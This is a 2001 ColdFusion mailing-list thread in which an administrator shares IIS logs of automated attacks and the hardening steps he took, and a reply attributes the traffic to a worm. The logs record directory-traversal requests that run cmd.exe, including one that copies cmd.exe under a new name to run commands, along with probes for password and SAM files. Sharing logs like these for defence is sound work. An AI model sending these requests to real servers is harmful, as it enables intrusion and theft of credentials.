Re: Log files of a web attack.

Wed, 09 May 2001 00:12:29 -0700 

A little more info is starting to go around. This attack is a scripted
attack from a worm that infects Solaris machines, which then attack up to
2000 IIS servers before putting up the f*ck usa pages on the Solaris
machine. Mostly harmless, but you gotta admire the mind that came up with
that. Script kiddies who are to lazy to run their own scripts! ;-)

I am getting more and more annoyed at Microsoft's poor excuse for a web
server every day though.

jon
----- Original Message -----
From: <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, May 08, 2001 9:52 PM
Subject: OT: Log files of a web attack.


> Hi,
>
> I thought the group would like to see the techniques of a recent attack on
> our web servers. They've been doing this a couple times a day for a week.
> UUNet (their ISP) is slow in doing stopping them.
>
> To secure IIS we've removed all extensions except cfm. We've taken out all
> the iis folders and files like /mdac, /scripts and /printers. We've
secured
> cfide folder with passwords including locking out the user after a couple
> failed attempts and log the failures. Lastly, we've remove all permissions
> from cmd.exe.
>
> This has kept them out to date. Any additional ideas are welcomed. Non of
> this is top secret info, the hackers already know it, but do you and are
you
> protected?
>
> HTH,
>
> Rick Moon
>
>
> 2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET
> /scripts/..%pc../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:36:45 209.183.204.251 - myIP 80 GET
> /scripts/..%9v../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:36:56 209.183.204.251 - myIP 80 GET
> /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET
> /scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET
> /scripts/...../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:04 209.183.204.251 - myIP 80 GET
> /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET
> /scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET
> /scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:38:17 209.183.204.251 - myIP 80 GET
> /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 01:26:07 200.245.48.155 - myIP GET
> /scripts..\../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:57:58 200.230.112.153 - myIP 80 GET
> /iisadmpwd/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:00 200.230.112.153 - myIP 80 GET
> /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:14 200.230.112.153 - myIP 80 GET
> /cgi-bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:22 200.230.112.153 - myIP 80 GET
> /samples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:29 200.230.112.153 - myIP 80 GET
> /_vti_cnf/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:36 200.230.112.153 - myIP 80 GET
> /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:42 200.230.112.153 - myIP 80 GET
> /adsamples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:43:02 200.245.48.132 - myIP 80 HEAD /aaa - 404 -
> 2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /carbo.dll - 404 -
> 2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /cgi-win/uploader.exe -
> 404 -
> 2001-05-05 02:43:06 200.245.48.132 - myIP 80 HEAD /search97.vts - 404 -
> 2001-05-05 02:43:08 200.245.48.132 - myIP 80 HEAD /_vti_inf.html - 200 -
> 2001-05-05 02:43:10 200.245.48.132 - myIP 80 HEAD /_vti_pvt/service.pwd -
> 404 -
> 2001-05-05 02:43:12 200.245.48.132 - myIP 80 HEAD /_vti_pvt/users.pwd -
> 404 -
> 2001-05-05 02:43:13 200.245.48.132 - myIP 80 HEAD /_vti_pvt/authors.pwd -
> 404 -
> 2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /....../autoexec.bat -
> 404 -
> 2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /..../config.sys - 404 -
> 2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/achg.htr -
> 404 -
> 2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp.htr -
> 404 -
> 2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2.htr -
> 404 -
> 2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2b.htr -
> 404 -
> 2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp3.htr -
> 404 -
> 2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4.htr -
> 404 -
> 2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4b.htr -
> 404 -
> 2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot.htr -
> 404 -
> 2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot3.htr -
> 404 -
> 2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /cgi-bin/visadmin.exe -
> 404 -
> 2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD
/scripts/no-such-file.pl -
> 404 -
> 2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/fpcount.exe -
> 404 -
> 2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/rguest.exe -
> 404 -
> 2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/wguest.exe -
> 404 -
> 2001-05-05 02:43:32 200.245.48.132 - myIP 80 HEAD /default.asp::$DATA -
> 404 -
> 2001-05-05 02:43:35 200.245.48.132 - myIP 80 HEAD
> /msadc/Samples/SELECTOR/showcode.asp |-|0|404_Object_Not_Found 404 -
> 2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD
> /adsamples/config/site.csc - 404 -
> 2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD
/scripts/iisadmin/ism.dll
> http/dir 404 -
> 2001-05-05 02:43:37 200.245.48.132 - myIP 80 HEAD
> /AdvWorks/equipment/catalog_type.asp |-|0|404_Object_Not_Found 404 -
> 2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD
> /cfdocs/expelval/openfile.cfm - 401 -
> 2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD
> /cfdocs/expelval/ExprCalc.cfm - 401 -
> 2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD
> /cfdocs/expelval/displayopenedfile.cfm - 401 -
> 2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD
> /cfdocs/expelval/sendmail.cfm - 401 -
> 2001-05-05 02:43:45 200.245.48.132 - myIP 80 HEAD /GetFile.cfm - 200 -
> 2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/get32.exe -
404 -
> 2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/alibaba.pl -
> 404 -
> 2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /cgi-bin/tst.bat - 404 -
> 2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /default.asp - 404 -
> 2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /winnt/repair/sam._ -
> 404 -
> 2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /cgi-bin/imagemap.exe -
> 404 -
> 2001-05-05 02:43:52 148.233.95.58 - myIP 80 GET /index.cfm - 200
> Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98;+Win+9x+4.90)
> 2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /cgi-bin/cgitest.exe -
> 404 -
> 2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /config.sys - 404 -
> 2001-05-05 02:43:55 200.245.48.132 - myIP 80 HEAD /scripts/webbbs.exe -
> 404 -
> 2001-05-05 02:43:57 200.245.48.132 - myIP 80 HEAD /cgi-bin/input.bat -
404 -
> 2001-05-05 02:44:03 200.245.48.132 - myIP 80 HEAD /test.idq - 404 -
> 2001-05-05 02:44:04 200.245.48.132 - myIP 80 HEAD /test.ida - 404 -
> 2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /scripts/counter.exe -
> 404 -
> 2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /common/browser.inc -
> 404 -
> 2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/echo.bat -
404 -
> 2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/hello.bat -
404 -
> 2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /rightfax/fuwww.dll -
> 404 -
> 2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /scripts/cgimail.exe -
> 404 -
> 2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD
> /officescan/cgi/jdkRqNotify.exe - 404 -
> 2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /ows-bin/perlidlc.bat
&dir
> 404 -
> 2001-05-05 02:44:13 200.245.48.132 - myIP 80 HEAD /cgi-bin/windmail.exe -
> 404 -
> 2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /null.htw
> CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 404 -
> 2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD
> /_vti_bin/_vti_aut/dvwssr.dll - 404 -
> 2001-05-05 02:44:17 200.245.48.132 - myIP 80 HEAD /scripts/wa.exe - 404 -
> 2001-05-05 02:45:22 200.64.239.78 - myIP 80 GET /index.cfm - 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
> 2001-05-05 02:46:23 200.53.250.14 - myIP 80 GET /index.cfm - 200
> Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
> 2001-05-05 02:48:53 200.245.48.141 - myIP 80 HEAD /index.cfm - 200 -
> 2001-05-05 02:49:25 200.245.48.141 - myIP 80 GET
> /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:49:36 200.245.48.141 - myIP 80 GET
> /scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:49:48 200.245.48.141 - myIP 80 GET
> /scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:49:53 200.245.48.141 - myIP 80 GET
> /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:50:05 200.245.48.141 - myIP 80 GET
> /scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:50:11 200.245.48.141 - myIP 80 GET
> /scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/newdsn.exe -
> 404 -
> 2001-05-05 02:43:07 200.245.48.132 - myIP HEAD
/scripts/tools/getdrvs.exe -
> 404 -
> 2001-05-05 02:43:14 200.245.48.132 - myIP HEAD
> /_vti_pvt/administrators.pwd - 404 -
> 2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.dll - 404 -
> 2001-05-05 02:43:16 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.exe - 404 -
> 2001-05-05 02:43:17 200.245.48.132 - myIP HEAD
> /samples/search/queryhit.htm - 404 -
> 2001-05-05 02:43:33 200.245.48.132 - myIP HEAD
> /iissamples/exair/howitworks/codebrws.asp - 404 -
> 2001-05-05 02:43:33 200.245.48.132 - myIP HEAD
> /iissamples/sdk/asp/docs/codebrws.asp - 404 -
> 2001-05-05 02:43:56 200.245.48.132 - myIP HEAD /cgi-bin/test.bat - 404 -
> 2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /cgi-bin/input2.bat - 404 -
> 2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /ssi/envout.bat - 404 -
> 2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /msadc/msadcs.dll - 404 -
> 2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /cgi-bin/htimage.exe -
404 -
> 2001-05-05 02:44:02 200.245.48.132 - myIP HEAD /test.idc - 404 -
> 2001-05-05 02:44:05 200.245.48.132 - myIP HEAD /test.idw - 404 -
> 2001-05-05 02:44:11 200.245.48.132 - myIP HEAD /default.asp - 404 -
> This is the really bad one.
> 2001-05-01 08:23:09 200.245.48.145 - myIP 80 GET
> /scripts/../../winnt/system32/cmd.exe
> /c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe
> 2001-05-01 08:23:11 200.245.48.145 - myIP 80 GET
> /scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\inetpub\wwwroot
>
> end.
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Reply via email to